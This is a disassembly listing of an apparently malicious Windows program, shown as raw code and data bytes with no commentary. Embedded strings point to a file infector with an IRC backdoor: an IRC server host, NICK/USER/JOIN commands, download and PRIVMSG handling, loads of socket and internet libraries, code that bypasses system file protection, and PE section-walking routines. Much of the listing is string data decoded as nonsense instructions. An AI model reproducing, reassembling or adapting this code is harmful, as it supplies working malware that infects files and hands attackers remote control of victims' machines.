loc_4866AB: ; CODE XREF: sub_4865AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_4866F2
add [edi+65h], al
jz short near ptr loc_4866FB+1
loc_4866B6: ; CODE XREF: sub_4865AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_486708
loc_4866C2: ; CODE XREF: sub_4865AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_4866CB: ; CODE XREF: sub_4865AF+C7�j
db 65h
jz short near ptr loc_48671A+1
outsd
db 64h
jnz short near ptr loc_486739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_48672D+6
loc_4866DF: ; CODE XREF: sub_4865AF+C5�j
db 65h
insd
loc_4866E1: ; CODE XREF: sub_4865AF+BE�j
jo short near ptr loc_486727+2
loc_4866E3: ; CODE XREF: sub_4865AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_486741+3
db 65h
insd
loc_4866F2: ; CODE XREF: sub_4865AF+FF�j
jo short near ptr loc_486741+3
popa
jz short near ptr loc_48675E+1
inc ecx
add [edi+65h], al
loc_4866FB: ; CODE XREF: sub_4865AF+105�j
jz short loc_486753
db 65h
jb short near ptr loc_486772+1
loc_486700: ; CODE XREF: sub_4865AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_486708: ; CODE XREF: sub_4865AF+110�j
db 65h
jb short near ptr loc_48677C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_48676B+1
outsd
insb
jnz short near ptr loc_486781+6
loc_48671A: ; CODE XREF: sub_4865AF:loc_4866CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_48678C+2
popa
jz short near ptr loc_48678C+1
outsd
outsb
inc ecx
loc_486727: ; CODE XREF: sub_4865AF:loc_4866E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_48672D: ; CODE XREF: sub_4865AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_48678F
loc_486739: ; CODE XREF: sub_4865AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_486741: ; CODE XREF: sub_4865AF+13F�j
; sub_4865AF:loc_4866F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_486753: ; CODE XREF: sub_4865AF:loc_4866FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_4867C9+1
arpl [ebp+73h], sp
loc_48675E: ; CODE XREF: sub_4865AF+146�j
jnb short $+2
push eax
jb short loc_4867D2
arpl [ebp+73h], sp
jnb short near ptr loc_486794+7
xor al, [esi+69h]
loc_48676B: ; CODE XREF: sub_4865AF+164�j
jb short near ptr loc_4867DA+6
jz short $+2
push eax
jb short near ptr loc_4867DA+7
loc_486772: ; CODE XREF: sub_4865AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_4867A9+1
xor cl, [esi+65h]
js short near ptr loc_4867EC+4
loc_48677C: ; CODE XREF: sub_4865AF:loc_486708�j
add [ebx+65h], dl
jz short near ptr loc_4867C5+2
loc_486781: ; CODE XREF: sub_4865AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_48678C: ; CODE XREF: sub_4865AF+173�j
; sub_4865AF+170�j
db 65h
jnb short loc_4867D0
loc_48678F: ; CODE XREF: sub_4865AF+188�j
add [ebx+65h], dl
jz short loc_4867DA
loc_486794: ; CODE XREF: sub_4865AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_486818
jz short loc_48680C
insd
push esp
loc_4867A9: ; CODE XREF: sub_4865AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_486813
imul esp, [ebp+77h], 6946664Fh
insb
loc_4867C5: ; CODE XREF: sub_4865AF+1D0�j
add gs:[esi+69h], dl
loc_4867C9: ; CODE XREF: sub_4865AF+1AA�j
jb short near ptr loc_48683E+1
jnz short loc_48682E
insb
inc ecx
insb
loc_4867D0: ; CODE XREF: sub_4865AF:loc_48678C�j
insb
outsd
loc_4867D2: ; CODE XREF: sub_4865AF+1B2�j
arpl [eax], ax
push edi
jb short loc_486840
jz short loc_48683E
inc esi
loc_4867DA: ; CODE XREF: sub_4865AF+1E3�j
; sub_4865AF:loc_48676B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_48685A
push eax
jb short near ptr loc_48684F+3
jbe short near ptr loc_48684F+5
insb
loc_4867EC: ; CODE XREF: sub_4865AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 6845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_48683B+1
jb short near ptr loc_48685F+1
popa
jz short loc_486863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_486870
push eax
loc_48680C: ; CODE XREF: sub_4865AF+1F6�j
jb short loc_48687D
arpl [ebp+73h], sp
jnb short $+2
loc_486813: ; CODE XREF: sub_4865AF+20C�j
dec esi
jz short near ptr loc_486856+3
jb short loc_48687D
loc_486818: ; CODE XREF: sub_4865AF+1F4�j
popa
jz short loc_486880
push eax
jb short loc_48688D
arpl [ebp+73h], sp
jnb short near ptr loc_486863+5
js short $+2
dec esi
jz short loc_48686B
jb short loc_48688F
popa
jz short near ptr loc_48688F+3
push ebx
loc_48682E: ; CODE XREF: sub_4865AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_48689E+1
popa
loc_48683B: ; CODE XREF: sub_4865AF+248�j
jz short loc_4868A2
push ebp
loc_48683E: ; CODE XREF: sub_4865AF+228�j
; sub_4865AF:loc_4867C9�j
jnb short near ptr loc_4868A4+1
loc_486840: ; CODE XREF: sub_4865AF+226�j
jb short near ptr loc_48688F+3
jb short loc_4868B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_486899
popa
jo short near ptr loc_4868A4+1
loc_48684F: ; CODE XREF: sub_4865AF+238�j
; sub_4865AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_486856: ; CODE XREF: sub_4865AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_48685A: ; CODE XREF: sub_4865AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_48685F: ; CODE XREF: sub_4865AF+24A�j
jo short loc_4868C6
outsb
inc esi
loc_486863: ; CODE XREF: sub_4865AF+24D�j
; sub_4865AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_48686B: ; CODE XREF: sub_4865AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_4868DF
loc_486870: ; CODE XREF: sub_4865AF+25A�j
arpl [ebp+73h], sp
jnb short loc_4868C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_4868CB+1
loc_48687D: ; CODE XREF: sub_4865AF:loc_48680C�j
; sub_4865AF+267�j
jo short near ptr loc_4868E3+1
outsb
loc_486880: ; CODE XREF: sub_4865AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_4868FB+1
loc_48688D: ; CODE XREF: sub_4865AF+26D�j
jz short near ptr loc_4868F3+1
loc_48688F: ; CODE XREF: sub_4865AF+279�j
; sub_4865AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_486909
jnz short near ptr loc_4868F7+1
insb
dec ebp
loc_486899: ; CODE XREF: sub_4865AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_486914+3
loc_48689E: ; CODE XREF: sub_4865AF+289�j
add [esi+74h], cl
push ecx
loc_4868A2: ; CODE XREF: sub_4865AF:loc_48683B�j
jnz short loc_486909
loc_4868A4: ; CODE XREF: sub_4865AF:loc_48683E�j
; sub_4865AF+29E�j
jb short near ptr loc_48691E+1
dec ecx
outsb
outsw
jb short near ptr loc_486918+1
popa
jz short loc_486918
outsd
outsb
push esp
outsd
loc_4868B3: ; CODE XREF: sub_4865AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_48690F+2
jb short loc_486925
jz short near ptr loc_486922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_4868C6: ; CODE XREF: sub_4865AF:loc_48685F�j
db 65h
insd
outsd
loc_4868C9: ; CODE XREF: sub_4865AF+2C4�j
jb short loc_486944
loc_4868CB: ; CODE XREF: sub_4865AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_486941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_4868DF: ; CODE XREF: sub_4865AF+2BF�j
outsb
jnb short near ptr loc_48694A+1
push ebx
loc_4868E3: ; CODE XREF: sub_4865AF:loc_48687D�j
jz short loc_486957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_486950
jb short loc_486965
jnz short near ptr loc_486962+1
loc_4868F3: ; CODE XREF: sub_4865AF:loc_48688D�j
add [ebx+6Ch], ah
outsd
loc_4868F7: ; CODE XREF: sub_4865AF+2E6�j
jnb short loc_48695E
jnb short near ptr loc_486969+1
loc_4868FB: ; CODE XREF: sub_4865AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_486909: ; CODE XREF: sub_4865AF+2E4�j
; sub_4865AF:loc_4868A2�j
db 65h
jz short near ptr loc_486973+1
outsd
jnb short near ptr loc_486981+2
loc_48690F: ; CODE XREF: sub_4865AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_486914: ; CODE XREF: sub_4865AF+2ED�j
add gs:[edx+65h], dh
loc_486918: ; CODE XREF: sub_4865AF+2FE�j
; sub_4865AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_486981+1
outsb
loc_48691E: ; CODE XREF: sub_4865AF:loc_4868A4�j
add fs:[ebx+6Fh], dh
loc_486922: ; CODE XREF: sub_4865AF+30D�j
arpl [ebx+65h], bp
loc_486925: ; CODE XREF: sub_4865AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_486990
jb short loc_48699B
db 65h
jz short loc_486973
insb
outsd
jnb short near ptr loc_486998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_4869A4
jb short near ptr loc_4869AE+1
loc_486941: ; CODE XREF: sub_4865AF+329�j
db 65h
jz short loc_48698B
loc_486944: ; CODE XREF: sub_4865AF:loc_4868C9�j
db 65h
jz short loc_48698A
outsd
outsb
outsb
loc_48694A: ; CODE XREF: sub_4865AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_486950: ; CODE XREF: sub_4865AF+33E�j
jz short near ptr loc_4869B2+1
jz short loc_4869B9
add [ecx+6Eh], cl
loc_486957: ; CODE XREF: sub_4865AF:loc_4868E3�j
jz short near ptr loc_4869BC+2
jb short loc_4869C9
db 65h
jz short near ptr loc_4869AB+2
loc_48695E: ; CODE XREF: sub_4865AF:loc_4868F7�j
jo short loc_4869C5
outsb
inc ecx
loc_486962: ; CODE XREF: sub_4865AF+342�j
add [ecx+6Eh], cl
loc_486965: ; CODE XREF: sub_4865AF+340�j
jz short near ptr loc_4869CB+1
jb short loc_4869D7
loc_486969: ; CODE XREF: sub_4865AF+34A�j
db 65h
jz short near ptr loc_4869BA+1
jo short loc_4869D3
outsb
push ebp
jb short near ptr loc_4869DC+2
inc ecx
loc_486973: ; CODE XREF: sub_4865AF+37E�j
; sub_4865AF:loc_486909�j
add [ecx+6Eh], cl
jz short near ptr loc_4869DC+1
jb short loc_4869E8
db 65h
jz short near ptr loc_4869CE+1
db 65h
popa
db 64h
inc esi
loc_486981: ; CODE XREF: sub_4865AF+36C�j
; sub_4865AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_48698A: ; CODE XREF: sub_4865AF:loc_486944�j
dec ecx
loc_48698B: ; CODE XREF: sub_4865AF:loc_486941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_486990: ; CODE XREF: sub_4865AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_486998: ; CODE XREF: sub_4865AF+383�j
jnb short near ptr loc_4869FD+2
dec ebx
loc_48699B: ; CODE XREF: sub_4865AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_486A09
loc_4869A4: ; CODE XREF: sub_4865AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_4869EC+2
js short loc_4869EC
loc_4869AB: ; CODE XREF: sub_4865AF+3AC�j
add [edx+65h], dl
loc_4869AE: ; CODE XREF: sub_4865AF+390�j
db 67h
push ecx
jnz short loc_486A17
loc_4869B2: ; CODE XREF: sub_4865AF:loc_486950�j
jb short near ptr loc_486A2C+1
push esi
popa
insb
jnz short near ptr loc_486A1D+1
loc_4869B9: ; CODE XREF: sub_4865AF+3A3�j
inc ebp
loc_4869BA: ; CODE XREF: sub_4865AF:loc_486969�j
js short loc_4869FD
loc_4869BC: ; CODE XREF: sub_4865AF:loc_486957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_486A1A
popa
loc_4869C5: ; CODE XREF: sub_4865AF:loc_48695E�j
insb
jnz short near ptr loc_486A2C+1
inc ebp
loc_4869C9: ; CODE XREF: sub_4865AF+3AA�j
js short loc_486A0C
loc_4869CB: ; CODE XREF: sub_4865AF:loc_486965�j
add [esi+33h], dl
loc_4869CE: ; CODE XREF: sub_4865AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_4869D3: ; CODE XREF: sub_4865AF+3BD�j
mov edx, esp
push 1
loc_4869D7: ; CODE XREF: sub_4865AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_4869DC: ; CODE XREF: sub_4865AF+3C7�j
; sub_4865AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_4869E8: ; CODE XREF: sub_4865AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_4869EC: ; CODE XREF: sub_4865AF+3FA�j
; sub_4865AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_4865AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ;
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_4869FD: ; CODE XREF: sub_4865AF:loc_4869BA�j
; sub_4865AF:loc_486998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ;
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4865AF
loc_486A09: ; CODE XREF: sub_4865AF+3F3�j
add [edx+5], ch
loc_486A0C: ; CODE XREF: sub_4865AF:loc_4869C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_486A17: ; CODE XREF: sub_4865AF+401�j
push esp
push 40h
loc_486A1A: ; CODE XREF: sub_4865AF+412�j
push ecx
push edx
push ebx
loc_486A1D: ; CODE XREF: sub_4865AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_486A2C: ; CODE XREF: sub_4865AF:loc_4869B2�j
; sub_4865AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_4865AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ;
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ;
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ;
db 0C4h ;
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ;
db 0C0h ;
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ;
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ;
db 0C4h ;
db 20h
db 33h ; 3
db 0D2h ;
db 85h ;
db 0C0h ;
db 0Fh
db 99h ;
db 0C2h ;
db 0F7h ;
db 0DAh ;
db 58h ; X
db 23h ; #
db 0C2h ;
db 0C3h ;
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ;
db 0C1h ;
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ;
db 0A5h ;
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ;
db 0D4h ;
db 6Ah ; j
db 0
db 8Bh ;
db 0CCh ;
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ;
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ;
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ;
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ;
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ;
db 0Ch
db 8Dh ;
db 95h ;
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ;
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ;
db 8Bh ;
db 85h ;
db 0FEh ;
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ;
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ;
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ;
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ;
db 0F4h ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ;
db 29h ; )
db 0
db 0
db 0E8h ;
db 0DFh ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 0C7h ;
db 5Fh ; _
db 0C3h ;
db 55h ; U
db 0E8h ;
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 500000h, 70000000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 656F7477h
dd 7870716Ch, 4553550Ah, 4A6B2052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
dd 3AAB5957h, 10A61429h, 7F95D1CAh, 714BC3D4h, 0D8B8B352h
dd 1Ah dup(0)
; =============== S U B R O U T I N E =======================================
sub_487414 proc near ; CODE XREF: sub_4874CA:loc_4874B8�p
; sub_48751B+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042F4h], 0
and dword ptr [ebp+1042F8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_487430: ; CODE XREF: sub_487414+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_487452
cmp eax, [edx+8]
jnb short loc_487452
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042F4h], edx
mov [ebp+1042F8h], eax
jmp short loc_487457
; ---------------------------------------------------------------------------
loc_487452: ; CODE XREF: sub_487414+23�j
; sub_487414+28�j
add edx, 28h
loop loc_487430
loc_487457: ; CODE XREF: sub_487414+3C�j
popa
retn 4
sub_487414 endp
; ---------------------------------------------------------------------------
mov [ebp+102467h], al
call sub_4874CA
push 20h
lea eax, [ebp+102394h]
pop ecx
loc_487472: ; CODE XREF: fuck:00487479�j
cmp [eax], ebx
jz short loc_487482
add eax, 4
loop loc_487472
inc dword ptr [ebp+1042D0h]
retn
; ---------------------------------------------------------------------------
loc_487482: ; CODE XREF: fuck:00487474�j
neg ecx
add ecx, [ebp+102467h]
jecxz short loc_48749C
loc_48748C: ; CODE XREF: fuck:00487494�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_48748C
mov [ebp+102394h], ebx
; START OF FUNCTION CHUNK FOR sub_4874CA
